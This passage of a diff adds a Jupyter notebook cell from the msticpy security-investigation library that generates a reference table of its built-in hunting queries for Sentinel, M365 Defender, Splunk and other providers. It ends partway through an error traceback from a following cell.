+   "execution_count": 6,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-12-17T21:38:38.357808Z",
+     "start_time": "2019-12-17T21:38:37.357112Z"
+    },
+    "tags": [
+     "outputPrepend"
+    ]
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Generating documentation for for the following providers\n",
+      "MSSentinel, M365D, Kusto, SecurityGraph, Splunk, ResourceGraph, Sumologic, LocalData\n",
+      "Skipping the following providers\n",
+      "AzureSentinel, MDE, Mordor, LogAnalytics, AzureSecurityCenter, MDATP\n",
+      "Queries for Local Data\n",
+      "----------------------\n",
+      "\n",
+      "===============  ================================  ======================================  ============  =======\n",
+      "QueryGroup       Query                             Description                             ReqdParams    Table\n",
+      "===============  ================================  ======================================  ============  =======\n",
+      "Azure            list_all_signins_geo              List all Azure AD logon events                        -\n",
+      "Network          list_azure_network_flows_by_host  List Azure Network flows by host name                 -\n",
+      "Network          list_azure_network_flows_by_ip    List Azure Network flows by IP address                -\n",
+      "SecurityAlert    list_alerts                       Retrieves list of alerts                              -\n",
+      "WindowsSecurity  get_process_tree                  Get process tree for a process                        -\n",
+      "WindowsSecurity  list_host_events                  List events failures on host                          -\n",
+      "WindowsSecurity  list_host_logon_failures          List logon failures on host                           -\n",
+      "WindowsSecurity  list_host_logons                  List logons on host                                   -\n",
+      "WindowsSecurity  list_host_processes               List processes on host                                -\n",
+      "===============  ================================  ======================================  ============  =======\n",
+      "\n",
+      "\n",
+      "Queries for Microsoft 365 Defender\n",
+      "----------------------------------\n",
+      "\n",
+      "============  ==========================  ==================================================================================================================================  ==================================================================  ===================\n",
+      "QueryGroup    Query                       Description                                                                                                                         ReqdParams                                                          Table\n",
+      "============  ==========================  ==================================================================================================================================  ==================================================================  ===================\n",
+      "MDATP         file_path                   Lists all file events from files in a certain path                                                                                  end (datetime), start (datetime), path (str)                        DeviceProcessEvents\n",
+      "MDATP         host_alerts                 Lists alerts by for a specified hostname                                                                                            host_name (str), end (datetime), start (datetime)                   DeviceAlertEvents\n",
+      "MDATP         host_connections            Lists alerts by for a specified hostname                                                                                            host_name (str), end (datetime), start (datetime)                   DeviceNetworkEvents\n",
+      "MDATP         ip_alerts                   Lists alerts associated with a specified remote IP                                                                                  ip_address (str), end (datetime), start (datetime)                  DeviceAlertEvents\n",
+      "MDATP         ip_connections              Lists alerts associated with a specified remote IP                                                                                  ip_address (str), end (datetime), start (datetime)                  DeviceNetworkEvents\n",
+      "MDATP         list_alerts                 Retrieves list of alerts                                                                                                            start (datetime), end (datetime)                                    DeviceAlertEvents\n",
+      "MDATP         list_connections            Retrieves list of network connections for a host                                                                                    start (datetime), end (datetime)                                    DeviceNetworkEvents\n",
+      "MDATP         list_filehash               Lists all file events by hash                                                                                                       file_hash (str), end (datetime), start (datetime)                   DeviceProcessEvents\n",
+      "MDATP         list_files                  Lists all file events by filename                                                                                                   file_name (str), end (datetime), start (datetime)                   DeviceProcessEvents\n",
+      "MDATP         list_host_processes         Lists all process creations for a host                                                                                              host_name (str), end (datetime), start (datetime)                   DeviceProcessEvents\n",
+      "MDATP         process_cmd_line            Lists all processes with a command line containing a string                                                                         cmd_line (str), end (datetime), start (datetime)                    DeviceProcessEvents\n",
+      "MDATP         process_creations           Lists all processes created by name or hash                                                                                         end (datetime), start (datetime), process_identifier (str)          DeviceProcessEvents\n",
+      "MDATP         process_paths               Lists all processes created from a path                                                                                             file_path (str), end (datetime), start (datetime)                   DeviceProcessEvents\n",
+      "MDATP         protocol_connections        Lists alerts associated with a specified protocol                                                                                   end (datetime), start (datetime), protocol (str)                    DeviceNetworkEvents\n",
+      "MDATP         sha1_alerts                 Lists alerts associated with a specified SHA1 hash                                                                                  file_hash (str), end (datetime), start (datetime)                   DeviceAlertEvents\n",
+      "MDATP         url_alerts                  Lists alerts associated with a specified URL                                                                                        url (str), end (datetime), start (datetime)                         DeviceAlertEvents\n",
+      "MDATP         url_connections             Lists alerts associated with a specified URL                                                                                        url (str), end (datetime), start (datetime)                         DeviceNetworkEvents\n",
+      "MDATP         user_files                  Lists all files created by a user                                                                                                   end (datetime), start (datetime), account_name (str)                -\n",
+      "MDATP         user_logons                 Lists all user logons by user                                                                                                       end (datetime), start (datetime), account_name (str)                -\n",
+      "MDATP         user_network                Lists all network connections associated with a user                                                                                end (datetime), start (datetime), account_name (str)                -\n",
+      "MDATP         user_processes              Lists all processes created by a user                                                                                               end (datetime), start (datetime), account_name (str)                -\n",
+      "MDATPHunting  accessibility_persistence   This query looks for persistence or privilege escalation done using Windows Accessibility features.                                 start (datetime), end (datetime)                                    -\n",
+      "MDATPHunting  av_sites                    Pivot from downloads detected by Windows Defender Antivirus to other files downloaded from the same sites                           start (datetime), end (datetime)                                    -\n",
+      "MDATPHunting  b64_pe                      Finding base64 encoded PE files header seen in the command line parameters                                                          start (datetime), end (datetime)                                    -\n",
+      "MDATPHunting  brute_force                 Look for public IP addresses that failed to logon to a computer multiple times, using multiple accounts, and eventually succeeded.  start (datetime), end (datetime)                                    -\n",
+      "MDATPHunting  cve_2018_1000006l           Looks for CVE-2018-1000006 exploitation                                                                                             start (datetime), end (datetime)                                    -\n",
+      "MDATPHunting  cve_2018_1111               Looks for CVE-2018-1111 exploitation                                                                                                start (datetime), end (datetime)                                    -\n",
+      "MDATPHunting  cve_2018_4878               This query checks for specific processes and domain TLD used in the CVE-2018-4878                                                   start (datetime), end (datetime)                                    -\n",
+      "MDATPHunting  doc_with_link               Looks for a Word document attachment, from which a link was clicked, and after which there was a browser download.                  start (datetime), end (datetime)                                    -\n",
+      "MDATPHunting  dropbox_link                Looks for user content downloads from dropbox that originate from a link/redirect from a 3rd party site.                            start (datetime), end (datetime)                                    -\n",
+      "MDATPHunting  email_link                  Look for links opened from mail apps – if a detection occurred right afterwards                                                     start (datetime), end (datetime)                                    -\n",
+      "MDATPHunting  email_smartscreen           Look for links opened from outlook.exe, followed by a browser download and then a SmartScreen app warning                           start (datetime), end (datetime)                                    -\n",
+      "MDATPHunting  malware_recycle             Finding attackers hiding malware in the recycle bin.                                                                                start (datetime), end (datetime)                                    -\n",
+      "MDATPHunting  network_scans               Looking for high volume queries against a given RemoteIP, per ComputerName, RemotePort and Process                                  start (datetime), end (datetime)                                    -\n",
+      "MDATPHunting  powershell_downloads        Finds PowerShell execution events that could involve a download.                                                                    start (datetime), end (datetime)                                    -\n",
+      "MDATPHunting  service_account_powershell  Service Accounts Performing Remote PowerShell                                                                                       start (datetime), end (datetime)                                    -\n",
+      "MDATPHunting  smartscreen_ignored         Query for SmartScreen URL blocks, where the user has decided to run the malware nontheless.                                         start (datetime), end (datetime)                                    -\n",
+      "MDATPHunting  smb_discovery               Query for processes that accessed more than 10 IP addresses over port 445 (SMB) - possibly scanning for network shares.             start (datetime), end (datetime)                                    -\n",
+      "MDATPHunting  tor                         Looks for Tor client, or for a common Tor plugin called Meek.                                                                       start (datetime), end (datetime)                                    -\n",
+      "MDATPHunting  uncommon_powershell         Find which uncommon Powershell Cmdlets were executed on that machine in a certain time period.                                      timestamp (str), host_name (str), end (datetime), start (datetime)  -\n",
+      "MDATPHunting  user_enumeration            The query finds attempts to list users or groups using Net commands                                                                 start (datetime), end (datetime)                                    -\n",
+      "============  ==========================  ==================================================================================================================================  ==================================================================  ===================\n",
+      "\n",
+      "\n",
+      "Queries for Microsoft Sentinel\n",
+      "------------------------------\n",
+      "\n",
+      "==================  ================================  ===========================================================================================================  ===============================================================================================================  ===========================\n",
+      "QueryGroup          Query                             Description                                                                                                  ReqdParams                                                                                                       Table\n",
+      "==================  ================================  ===========================================================================================================  ===============================================================================================================  ===========================\n",
+      "Azure               get_vmcomputer_for_host           Gets latest VMComputer record for Host                                                                       host_name (str), end (datetime), start (datetime)                                                                VMComputer\n",
+      "Azure               get_vmcomputer_for_ip             Gets latest VMComputer record for IPAddress                                                                  ip_address (str), end (datetime), start (datetime)                                                               VMComputer\n",
+      "Azure               list_aad_signins_for_account      Lists Azure AD Signins for Account                                                                           end (datetime), start (datetime), account_name (str)                                                             SigninLogs\n",
+      "Azure               list_aad_signins_for_ip           Lists Azure AD Signins for an IP Address                                                                     ip_address_list (list), end (datetime), start (datetime)                                                         SigninLogs\n",
+      "Azure               list_all_signins_geo              Gets Signin data used by morph charts                                                                        end (datetime), start (datetime)                                                                                 SigninLogs\n",
+      "Azure               list_azure_activity_for_account   Lists Azure Activity for Account                                                                             end (datetime), start (datetime), account_name (str)                                                             AzureActivity\n",
+      "Azure               list_azure_activity_for_ip        Lists Azure Activity for Caller IP Address(es)                                                               ip_address_list (list), end (datetime), start (datetime)                                                         AzureActivity\n",
+      "Azure               list_azure_activity_for_resource  Lists Azure Activity for a Resource                                                                          resource_id (str), end (datetime), start (datetime)                                                              AzureActivity\n",
+      "Azure               list_storage_ops_for_hash         no description                                                                                               file_hash (str), end (datetime), start (datetime)                                                                StorageFileLogs\n",
+      "Azure               list_storage_ops_for_ip           no description                                                                                               ip_address (str), end (datetime), start (datetime)                                                               StorageFileLogs\n",
+      "AzureNetwork        az_net_analytics                  All Azure Network Analytics Data                                                                             end (datetime), start (datetime)                                                                                 AzureNetworkAnalytics_CL\n",
+      "AzureNetwork        dns_lookups_for_domain            Dns queries for a domain                                                                                     domain (str), end (datetime), start (datetime)                                                                   DnsEvents\n",
+      "AzureNetwork        dns_lookups_for_ip                Dns queries for a domain                                                                                     ip_address (str), end (datetime), start (datetime)                                                               DnsEvents\n",
+      "AzureNetwork        dns_lookups_from_ip               Dns queries for a domain                                                                                     ip_address (str), end (datetime), start (datetime)                                                               DnsEvents\n",
+      "AzureNetwork        get_heartbeat_for_host            Retrieves latest OMS Heartbeat event for host.                                                               host_name (str)                                                                                                  Heartbeat\n",
+      "AzureNetwork        get_heartbeat_for_ip              Retrieves latest OMS Heartbeat event for ip address.                                                         ip_address (str)                                                                                                 Heartbeat\n",
+      "AzureNetwork        get_host_for_ip                   Gets the latest AzureNetworkAnalytics interface event for a host.                                            ip_address (str)                                                                                                 AzureNetworkAnalytics_CL\n",
+      "AzureNetwork        get_ips_for_host                  Gets the latest AzureNetworkAnalytics interface event for a host.                                            host_name (str)                                                                                                  AzureNetworkAnalytics_CL\n",
+      "AzureNetwork        list_azure_network_flows_by_host  Retrieves Azure network analytics flow events.                                                               end (datetime), host_name (str), start (datetime)                                                                AzureNetworkAnalytics_CL\n",
+      "AzureNetwork        list_azure_network_flows_by_ip    Retrieves Azure network analytics flow events.                                                               ip_address_list (list), end (datetime), start (datetime)                                                         AzureNetworkAnalytics_CL\n",
+      "AzureSentinel       get_bookmark_by_id                Retrieves a single Bookmark by BookmarkId                                                                    bookmark_id (str), end (datetime), start (datetime)                                                              HuntingBookmark\n",
+      "AzureSentinel       get_bookmark_by_name              Retrieves one or more Bookmarks by Bookmark Name                                                             bookmark_name (str), end (datetime), start (datetime)                                                            HuntingBookmark\n",
+      "AzureSentinel       list_bookmarks                    Retrieves list of bookmarks                                                                                  start (datetime), end (datetime)                                                                                 HuntingBookmark\n",
+      "AzureSentinel       list_bookmarks_for_entity         Retrieves bookmarks for entity string                                                                        end (datetime), start (datetime)                                                                                 HuntingBookmark\n",
+      "AzureSentinel       list_bookmarks_for_tags           Retrieves Bookmark by one or mare Tags                                                                       end (datetime), start (datetime), bookmark_tags (list)                                                           HuntingBookmark\n",
+      "Heartbeat           get_heartbeat_for_host            Retrieves latest OMS Heartbeat event for host.                                                               host_name (str)                                                                                                  Heartbeat\n",
+      "Heartbeat           get_heartbeat_for_ip              Retrieves latest OMS Heartbeat event for ip address.                                                         ip_address (str)                                                                                                 Heartbeat\n",
+      "Heartbeat           get_info_by_hostname              Deprecated - use 'get_heartbeat_for_host'                                                                    host_name (str), end (datetime), start (datetime)                                                                Heartbeat\n",
+      "Heartbeat           get_info_by_ipaddress             Deprecated - use 'get_heartbeat_for_ip'                                                                      ip_address (str), end (datetime), start (datetime)                                                               Heartbeat\n",
+      "LinuxAudit          auditd_all                        Extract all audit messages grouped by mssg_id                                                                start (datetime), end (datetime)                                                                                 AuditLog_CL\n",
+      "LinuxSyslog         all_syslog                        Returns all syslog activity for a host                                                                       start (datetime), end (datetime)                                                                                 Syslog\n",
+      "LinuxSyslog         cron_activity                     All cron activity                                                                                            start (datetime), end (datetime)                                                                                 Syslog\n",
+      "LinuxSyslog         list_account_logon_failures       All failed user logon events from an IP address                                                              end (datetime), start (datetime), account_name (str)                                                             Syslog\n",
+      "LinuxSyslog         list_host_logon_failures          All failed user logon events on a host                                                                       host_name (str), end (datetime), start (datetime)                                                                Syslog\n",
+      "LinuxSyslog         list_ip_logon_failures            All failed user logon events from an IP address                                                              ip_address (str), end (datetime), start (datetime)                                                               Syslog\n",
+      "LinuxSyslog         list_logon_failures               All failed user logon events on any host                                                                     start (datetime), end (datetime)                                                                                 Syslog\n",
+      "LinuxSyslog         list_logons_for_account           All successful user logon events for account (all hosts)                                                     end (datetime), start (datetime), account_name (str)                                                             Syslog\n",
+      "LinuxSyslog         list_logons_for_host              All logon events on a host                                                                                   host_name (str), end (datetime), start (datetime)                                                                Syslog\n",
+      "LinuxSyslog         list_logons_for_source_ip         All successful user logon events for source IP (all hosts)                                                   ip_address (str), end (datetime), start (datetime)                                                               Syslog\n",
+      "LinuxSyslog         squid_activity                    All squid proxy activity                                                                                     host_name (str), end (datetime), start (datetime)                                                                Syslog\n",
+      "LinuxSyslog         sudo_activity                     All sudo activity                                                                                            end (datetime), start (datetime)                                                                                 Syslog\n",
+      "LinuxSyslog         user_group_activity               All user/group additions, deletions, and modifications                                                       start (datetime), end (datetime)                                                                                 Syslog\n",
+      "LinuxSyslog         user_logon                        All user logon events on a host                                                                              host_name (str), end (datetime), start (datetime)                                                                Syslog\n",
+      "MultiDataSource     get_timeseries_anomalies          Time Series filtered anomalies detected using built-in KQL time series function-series_decompose_anomalies   table (str), start (datetime), end (datetime)                                                                    na\n",
+      "MultiDataSource     get_timeseries_data               Retrieves TimeSeriesData prepared to use with built-in KQL time series functions                             table (str), start (datetime), end (datetime)                                                                    na\n",
+      "MultiDataSource     get_timeseries_decompose          Time Series decomposition and anomalies generated using built-in KQL time series function- series_decompose  table (str), start (datetime), end (datetime)                                                                    na\n",
+      "MultiDataSource     plot_timeseries_datawithbaseline  Plot timeseries data using built-in KQL time series decomposition using built-in KQL render method           table (str), start (datetime), end (datetime)                                                                    na\n",
+      "MultiDataSource     plot_timeseries_scoreanomolies    Plot timeseries anomaly score using built-in KQL render method                                               table (str), start (datetime), end (datetime)                                                                    na\n",
+      "Network             get_heartbeat_for_host            Retrieves latest OMS Heartbeat event for host.                                                               host_name (str)                                                                                                  Heartbeat\n",
+      "Network             get_heartbeat_for_ip              Retrieves latest OMS Heartbeat event for ip address.                                                         ip_address (str)                                                                                                 Heartbeat\n",
+      "Network             get_host_for_ip                   Gets the latest AzureNetworkAnalytics interface event for a host.                                            ip_address (str)                                                                                                 AzureNetworkAnalytics_CL\n",
+      "Network             get_ips_for_host                  Gets the latest AzureNetworkAnalytics interface event for a host.                                            host_name (str)                                                                                                  AzureNetworkAnalytics_CL\n",
+      "Network             list_azure_network_flows_by_host  Retrieves Azure network analytics flow events.                                                               end (datetime), host_name (str), start (datetime)                                                                AzureNetworkAnalytics_CL\n",
+      "Network             list_azure_network_flows_by_ip    Retrieves Azure network analytics flow events.                                                               ip_address_list (list), end (datetime), start (datetime)                                                         AzureNetworkAnalytics_CL\n",
+      "Office365           list_activity_for_account         Lists Office Activity for Account                                                                            end (datetime), start (datetime), account_name (str)                                                             OfficeActivity\n",
+      "Office365           list_activity_for_ip              Lists Office Activity for Caller IP Address(es)                                                              ip_address_list (list), end (datetime), start (datetime)                                                         OfficeActivity\n",
+      "Office365           list_activity_for_resource        Lists Office Activity for a Resource                                                                         resource_id (str), end (datetime), start (datetime)                                                              OfficeActivity\n",
+      "SecurityAlert       get_alert                         Retrieves a single alert by SystemAlertId                                                                    system_alert_id (str)                                                                                            SecurityAlert\n",
+      "SecurityAlert       list_alerts                       Retrieves list of alerts                                                                                     end (datetime), start (datetime)                                                                                 SecurityAlert\n",
+      "SecurityAlert       list_alerts_counts                Retrieves summary count of alerts by type                                                                    end (datetime), start (datetime)                                                                                 SecurityAlert\n",
+      "SecurityAlert       list_alerts_for_ip                Retrieves list of alerts with a common IP Address                                                            source_ip_list (str), end (datetime), start (datetime)                                                           SecurityAlert\n",
+      "SecurityAlert       list_related_alerts               Retrieves list of alerts with a common host, account or process                                              end (datetime), start (datetime)                                                                                 SecurityAlert\n",
+      "ThreatIntelligence  list_indicators                   Retrieves list of all current indicators.                                                                    start (datetime), end (datetime)                                                                                 ThreatIntelligenceIndicator\n",
+      "ThreatIntelligence  list_indicators_by_domain         Retrieves list of indicators by domain                                                                       domain_list (list), end (datetime), start (datetime)                                                             ThreatIntelligenceIndicator\n",
+      "ThreatIntelligence  list_indicators_by_email          Retrieves list of indicators by email address                                                                observables (list), end (datetime), start (datetime)                                                             ThreatIntelligenceIndicator\n",
+      "ThreatIntelligence  list_indicators_by_filepath       Retrieves list of indicators by file path                                                                    observables (list), end (datetime), start (datetime)                                                             ThreatIntelligenceIndicator\n",
+      "ThreatIntelligence  list_indicators_by_hash           Retrieves list of indicators by file hash                                                                    file_hash_list (list), end (datetime), start (datetime)                                                          ThreatIntelligenceIndicator\n",
+      "ThreatIntelligence  list_indicators_by_ip             Retrieves list of indicators by IP Address                                                                   ip_address_list (list), end (datetime), start (datetime)                                                         ThreatIntelligenceIndicator\n",
+      "ThreatIntelligence  list_indicators_by_url            Retrieves list of indicators by URL                                                                          url_list (list), end (datetime), start (datetime)                                                                ThreatIntelligenceIndicator\n",
+      "WindowsSecurity     get_host_logon                    Retrieves the logon event for the session id on the host                                                     logon_session_id (str), host_name (str), end (datetime), start (datetime)                                        SecurityEvent\n",
+      "WindowsSecurity     get_parent_process                Retrieves the parent process of a supplied process                                                           logon_session_id (str), process_id (str), host_name (str), process_name (str), end (datetime), start (datetime)  SecurityEvent\n",
+      "WindowsSecurity     get_process_tree                  Retrieves the process tree of a supplied process                                                             logon_session_id (str), process_id (str), host_name (str), process_name (str), end (datetime), start (datetime)  SecurityEvent\n",
+      "WindowsSecurity     list_all_logons_by_host           account all failed or successful logons to a host                                                            host_name (str), end (datetime), start (datetime)                                                                SecurityEvent\n",
+      "WindowsSecurity     list_events                       Retrieves list of all events                                                                                 start (datetime), end (datetime)                                                                                 SecurityEvent\n",
+      "WindowsSecurity     list_events_by_id                 Retrieves list of events on a host                                                                           event_list (list), end (datetime), start (datetime)                                                              SecurityEvent\n",
+      "WindowsSecurity     list_host_events                  Retrieves list of all events on a host                                                                       host_name (str), end (datetime), start (datetime)                                                                SecurityEvent\n",
+      "WindowsSecurity     list_host_events_by_id            Retrieves list of events on a host                                                                           host_name (str), end (datetime), start (datetime)                                                                SecurityEvent\n",
+      "WindowsSecurity     list_host_logon_failures          Retrieves the logon failure events on the host                                                               host_name (str), end (datetime), start (datetime)                                                                SecurityEvent\n",
+      "WindowsSecurity     list_host_logons                  Retrieves the logon events on the host                                                                       start (datetime), host_name (str), end (datetime)                                                                SecurityEvent\n",
+      "WindowsSecurity     list_host_processes               Retrieves list of processes on a host                                                                        host_name (str), end (datetime), start (datetime)                                                                SecurityEvent\n",
+      "WindowsSecurity     list_hosts_matching_commandline   Retrieves processes on hosts with matching commandline                                                       commandline (str), process_name (str), end (datetime), start (datetime)                                          SecurityEvent\n",
+      "WindowsSecurity     list_logon_attempts_by_account    Retrieves the logon events for an account                                                                    end (datetime), start (datetime), account_name (str)                                                             SecurityEvent\n",
+      "WindowsSecurity     list_logon_failures_by_account    Retrieves the logon failure events  for an account                                                           end (datetime), start (datetime), account_name (str)                                                             SecurityEvent\n",
+      "WindowsSecurity     list_logons_by_account            Retrieves the logon events for an account                                                                    start (datetime), end (datetime), account_name (str)                                                             SecurityEvent\n",
+      "WindowsSecurity     list_matching_processes           Retrieves list of processes matching process name                                                            process_name (str), end (datetime), start (datetime)                                                             SecurityEvent\n",
+      "WindowsSecurity     list_other_events                 Retrieves list of events other than logon and process on a host                                              host_name (str), end (datetime), start (datetime)                                                                SecurityEvent\n",
+      "WindowsSecurity     list_processes_in_session         Retrieves all processes on the host for a logon session                                                      logon_session_id (str), process_id (str), host_name (str), process_name (str), end (datetime), start (datetime)  SecurityEvent\n",
+      "==================  ================================  ===========================================================================================================  ===============================================================================================================  ===========================\n",
+      "\n",
+      "\n",
+      "Queries for Azure Resource Graph\n",
+      "--------------------------------\n",
+      "\n",
+      "=============  ==============================  ====================================================  ===================  =========\n",
+      "QueryGroup     Query                           Description                                           ReqdParams           Table\n",
+      "=============  ==============================  ====================================================  ===================  =========\n",
+      "ResourceGraph  list_detailed_virtual_machines  Retrieves list of VMs with network details                                 resources\n",
+      "ResourceGraph  list_public_ips                 Retrieves list of resources with public IP addresses                       resources\n",
+      "ResourceGraph  list_resources                  Retrieves list of resources                                                resources\n",
+      "ResourceGraph  list_resources_by_api_version   Retrieves list of resources for each API version                           resources\n",
+      "ResourceGraph  list_resources_by_type          Retrieves list of resources by type                   resource_type (str)  resources\n",
+      "ResourceGraph  list_virtual_machines           Retrieves list of VM resources                                             resources\n",
+      "=============  ==============================  ====================================================  ===================  =========\n",
+      "\n",
+      "\n",
+      "Queries for Microsoft Graph\n",
+      "---------------------------\n",
+      "\n",
+      "==================  ====================  ====================================================  ==================================================  =======\n",
+      "QueryGroup          Query                 Description                                           ReqdParams                                          Table\n",
+      "==================  ====================  ====================================================  ==================================================  =======\n",
+      "SecurityGraphAlert  get_alert             Retrieves a single alert by AlertId                   alert_id (str)                                      -\n",
+      "SecurityGraphAlert  list_alerts           Retrieves list of alerts                              start (datetime), end (datetime)                    -\n",
+      "SecurityGraphAlert  list_alerts_for_file  Retrieves list of alerts for file name, path or hash  end (datetime), start (datetime)                    -\n",
+      "SecurityGraphAlert  list_alerts_for_host  Retrieves list of alerts for a hostname or FQDN       host_name (str), end (datetime), start (datetime)   -\n",
+      "SecurityGraphAlert  list_alerts_for_ip    Retrieves list of alerts for a IP Address             ip_address (str), end (datetime), start (datetime)  -\n",
+      "SecurityGraphAlert  list_alerts_for_user  Retrieves list of alerts for a user account           end (datetime), start (datetime)                    -\n",
+      "SecurityGraphAlert  list_related_alerts   Retrieves list of alerts with a common entity         end (datetime), start (datetime)                    -\n",
+      "==================  ====================  ====================================================  ==================================================  =======\n",
+      "\n",
+      "\n",
+      "Queries for Splunk\n",
+      "------------------\n",
+      "\n",
+      "==============  =========================  =============================================================  ====================================================  =======\n",
+      "QueryGroup      Query                      Description                                                    ReqdParams                                            Table\n",
+      "==============  =========================  =============================================================  ====================================================  =======\n",
+      "Alerts          list_alerts                Retrieves list of alerts                                       start (datetime), end (datetime)                      -\n",
+      "Alerts          list_alerts_for_dest_ip    Retrieves list of alerts with a common destination IP Address  ip_address (str), end (datetime), start (datetime)    -\n",
+      "Alerts          list_alerts_for_src_ip     Retrieves list of alerts with a common source IP Address       ip_address (str), end (datetime), start (datetime)    -\n",
+      "Alerts          list_alerts_for_user       Retrieves list of alerts with a common username                user (str), end (datetime), start (datetime)          -\n",
+      "Alerts          list_all_alerts            Retrieves all configured alerts                                start (datetime), end (datetime)                      -\n",
+      "Authentication  list_logon_failures        All failed user logon events on any host                       start (datetime), end (datetime)                      -\n",
+      "Authentication  list_logons_for_account    All successful user logon events for account (all hosts)       end (datetime), start (datetime), account_name (str)  -\n",
+      "Authentication  list_logons_for_host       All logon events on a host                                     host_name (str), end (datetime), start (datetime)     -\n",
+      "Authentication  list_logons_for_source_ip  All successful user logon events for source IP (all hosts)     ip_address (str), end (datetime), start (datetime)    -\n",
+      "SplunkGeneral   get_events_parameterized   Generic parameterized query from index/source                  start (datetime), end (datetime)                      -\n",
+      "SplunkGeneral   list_all_datatypes         Summary of all events by index and sourcetype                  start (datetime), end (datetime)                      -\n",
+      "SplunkGeneral   list_all_savedsearches     Retrieves all saved searches                                   start (datetime), end (datetime)                      -\n",
+      "audittrail      list_all_audittrail        Retrieves all audit trail logs                                 start (datetime), end (datetime)                      -\n",
+      "==============  =========================  =============================================================  ====================================================  =======\n",
+      "\n",
+      "\n",
+      "Queries for Sumologic\n",
+      "---------------------\n",
+      "\n",
+      "================  ==================  =======================================  ================================  =======\n",
+      "QueryGroup        Query               Description                              ReqdParams                        Table\n",
+      "================  ==================  =======================================  ================================  =======\n",
+      "SumologicGeneral  list_all_datatypes  Summary of all events by sourceCategory  start (datetime), end (datetime)  -\n",
+      "================  ==================  =======================================  ================================  =======\n",
+      "\n",
+      "\n"
+     ]
+    }
+   ],
+   "source": [
+    "from msticpy.data import QueryProvider\n",
+    "import pandas as pd\n",
+    "\n",
+    "\n",
+    "providers = {\n",
+    "    \"MSSentinel\": \"Microsoft Sentinel\",\n",
+    "    \"M365D\": \"Microsoft 365 Defender\",\n",
+    "    \"Kusto\": \"Kusto/Azure Data Explorer\",\n",
+    "    \"SecurityGraph\": \"Microsoft Graph\",\n",
+    "    \"Splunk\": \"Splunk\",\n",
+    "    \"ResourceGraph\": \"Azure Resource Graph\",\n",
+    "    \"Sumologic\": \"Sumologic\",\n",
+    "    \"LocalData\": \"Local Data\",\n",
+    "}\n",
+    "\n",
+    "prov_list = QueryProvider.list_data_environments()\n",
+    "\n",
+    "print(\"Generating documentation for for the following providers\")\n",
+    "print(\", \".join(list(providers)))\n",
+    "print(\"Skipping the following providers\")\n",
+    "print(\", \".join(list(set(prov_list) - set(providers))))\n",
+    "env_q_stores = {prov: QueryProvider(prov) for prov in providers}\n",
+    "\n",
+    "\n",
+    "query_series = []\n",
+    "for env, env_queries in env_q_stores.items():\n",
+    "    query_names = env_queries.list_queries()\n",
+    "    for query_name in query_names:\n",
+    "        q_group, q_name = query_name.split(\".\")\n",
+    "        query_path = [env, q_group, q_name]\n",
+    "        q_obj = getattr(getattr(env_queries, q_group), q_name)\n",
+    "        qry = env_queries.query_store.get_query(q_group + \".\" + q_name)\n",
+    "        if \"table\" in qry.default_params:\n",
+    "            q_table = qry.default_params[\"table\"].get(\"default\", \"na\").split()[0]\n",
+    "        elif \"table\" in qry.required_params:\n",
+    "            q_table = qry.required_params[\"table\"].get(\"default\", \"na\").split()[0]\n",
+    "        else:\n",
+    "            q_table = \"-\"\n",
+    "        q_dict = {\n",
+    "            \"Environment\": env,\n",
+    "            \"QueryGroup\": q_group,\n",
+    "            \"Query\": q_name,\n",
+    "            \"Description\": qry.description,\n",
+    "            \"Req-Params\": \", \".join(\n",
+    "                [\n",
+    "                    f\"{param} ({p_data.get('type')})\"\n",
+    "                    for param, p_data in qry.required_params.items()\n",
+    "                ]\n",
+    "            ),\n",
+    "            # \"OtherParams\": \", \".join([f\"{param}\" for param in qry.default_params]),\n",
+    "            \"Table\": q_table,\n",
+    "        }\n",
+    "        query_series.append(pd.Series(q_dict))\n",
+    "\n",
+    "query_df = pd.DataFrame(query_series)\n",
+    "\n",
+    "# env_queries.\n",
+    "\n",
+    "from tabulate import tabulate\n",
+    "\n",
+    "for name, grp in query_df.groupby(\"Environment\"):\n",
+    "    friendly_name = providers.get(name, name)\n",
+    "    print(f\"Queries for {friendly_name}\")\n",
+    "    print(\"-\" * len(f\"Queries for {friendly_name}\"))\n",
+    "    print(f\"\\nData Environment identifier: {name}\")\n",
+    "    print()\n",
+    "    print(\n",
+    "        tabulate(\n",
+    "            grp.drop(columns=\"Environment\"),\n",
+    "            headers=\"keys\",\n",
+    "            showindex=\"never\",\n",
+    "            tablefmt=\"rst\",\n",
+    "        )\n",
+    "    )\n",
+    "    print(\"\\n\")\n",
+    "\n",
+    "file_name = \"source/data_acquisition/DataQueries.rst\"\n",
+    "with open(file_name, \"w\") as rst_file:\n",
+    "    rst_file.write(\"Data Queries Reference\\n\")\n",
+    "    rst_file.write(\"=\" * len(\"Data Queries Reference\") + \"\\n\\n\")\n",
+    "\n",
+    "    group_dict = {name: grp for name, group in query_df.groupby(\"Environment\")}\n",
+    "    for name, friendly_name in env_q_stores.items():\n",
+    "        grp = group_dict[name]\n",
+    "        rst_file.write(f\"Queries for {friendly_name}\")\n",
+    "        rst_file.write(\"-\" * len(f\"Queries for {friendly_name}\"))\n",
+    "        rst_file.write(f\"\\nData Environment identifier: {name}\")\n",
+    "        tbl_txt = tabulate(\n",
+    "            grp.drop(columns=\"Environment\"),\n",
+    "            headers=\"keys\",\n",
+    "            showindex=\"never\",\n",
+    "            tablefmt=\"rst\",\n",
+    "        )\n",
+    "        rst_file.write(tbl_txt)\n",
+    "        rst_file.write(\"\\n\\n\")\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 10,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-12-17T21:18:02.142425Z",
+     "start_time": "2019-12-17T21:18:02.137405Z"
+    }
+   },
+   "outputs": [
+    {
+     "ename": "AttributeError",
+     "evalue": "'DataFrameGroupBy' object has no attribute 'asdict'",
+     "output_type": "error",
+     "traceback": [
+      "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+      "\u001b[1;31mAttributeError\u001b[0m                            Traceback (most recent call last)",
